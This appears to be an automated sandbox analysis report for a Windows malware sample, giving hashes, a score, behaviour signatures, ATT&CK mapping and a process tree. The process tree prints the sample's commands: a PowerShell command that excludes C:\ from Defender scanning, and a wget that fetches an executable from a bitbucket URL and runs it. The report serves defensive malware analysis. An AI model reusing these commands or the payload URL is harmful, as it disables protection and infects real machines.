5f086e863e8c615df11356dd2f35df2d4111bf79591de64db6cb81fa6f04e958

General

Target

d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe
Size

88KB
MD5

6aeb9132bba916f4056093efd21137ac
SHA1

437bfbc610896b14b7f88f0bd0bec6de4a36f4a4
SHA256

d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055
SHA512

cd79f6ee903f749f2ce62f3cdb9416fff2ca58c218a70e293c1e8fdfd7622b01d9959ba7316f33d53e2714df25d1c7142d14c989d7def2aeccf9c3f8d77ae262
SSDEEP

1536:j7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfzxjOC:/q6+ouCpk2mpcWJ0r+QNTBfzL

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
868	powershell.exe
2664	powershell.exe
2500	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 2408	2216	d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe	28
PID 2216 wrote to memory of 2408	2216	d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe	28
PID 2216 wrote to memory of 2408	2216	d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe	28
PID 2216 wrote to memory of 2408	2216	d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe	28
PID 2408 wrote to memory of 2780	2408	cmd.exe	30
PID 2408 wrote to memory of 2780	2408	cmd.exe	30
PID 2408 wrote to memory of 2780	2408	cmd.exe	30
PID 2408 wrote to memory of 868	2408	cmd.exe	31
PID 2408 wrote to memory of 868	2408	cmd.exe	31
PID 2408 wrote to memory of 868	2408	cmd.exe	31
PID 2408 wrote to memory of 2664	2408	cmd.exe	32
PID 2408 wrote to memory of 2664	2408	cmd.exe	32
PID 2408 wrote to memory of 2664	2408	cmd.exe	32
PID 2408 wrote to memory of 2500	2408	cmd.exe	33
PID 2408 wrote to memory of 2500	2408	cmd.exe	33
PID 2408 wrote to memory of 2500	2408	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe
"C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEF.tmp\EF0.tmp\EF1.bat C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:2780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath "'C:\'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "wget "https://bitbucket.org/fwqffsfg/fasfwqfkuipo/downloads/qwercr.exe" -outfile "C:\Users\Admin\AppData\Roaming\2.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-Expression -Command "C:\Users\Admin\AppData\Roaming\2.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EEF.tmp\EF0.tmp\EF1.bat

Filesize
965B

MD5
807466a799dce9079514f297e3f2f54e

SHA1
89bbbc8721dd2e5b70224310a526846aed30cd35

SHA256
c5b87feb66edbacb17c57131722e360323a24d67fdfd89beb2a71b839ba4de31

SHA512
cf9e2d3dbcc933f5dbb0abb6d945186988ec39914ceaad3dea8a18ce7916904366a8e280410b57c28e9b1870038d1b0e3fdb1eb7b6e75864443cf500841b575e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b3c798a42d7973eea4b73d9eb784a770

SHA1
156f8164fa316b641f583a4f8fd27fca6e566868

SHA256
3c368d0b30e24428ee06dcc3790483cc7c07f83ef764cd53ce506d47bb4cbc7a

SHA512
b80a7dec77a417b016a044b1b4559f621998aa1df1924b41f69d9171443f85167cbe1cdbd21f4bb0384cf24e040021ea683bdcaac5989cec1540e6cbe44acbf9

Download Submit
memory/868-7-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/868-14-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/868-6-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/868-10-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/868-11-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/868-12-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/868-13-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/868-8-0x0000000000670000-0x0000000000678000-memory.dmp

Filesize
32KB

Download
memory/868-9-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/2500-38-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-33-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-37-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Filesize
512KB

Download
memory/2500-36-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-35-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Filesize
512KB

Download
memory/2500-34-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Filesize
512KB

Download
memory/2664-21-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/2664-27-0x000007FEF4BE0000-0x000007FEF557D000-memory.dmp

Filesize
9.6MB

Download
memory/2664-26-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2664-25-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2664-24-0x000007FEF4BE0000-0x000007FEF557D000-memory.dmp

Filesize
9.6MB

Download
memory/2664-23-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2664-22-0x000007FEF4BE0000-0x000007FEF557D000-memory.dmp

Filesize
9.6MB

Download
memory/2664-20-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing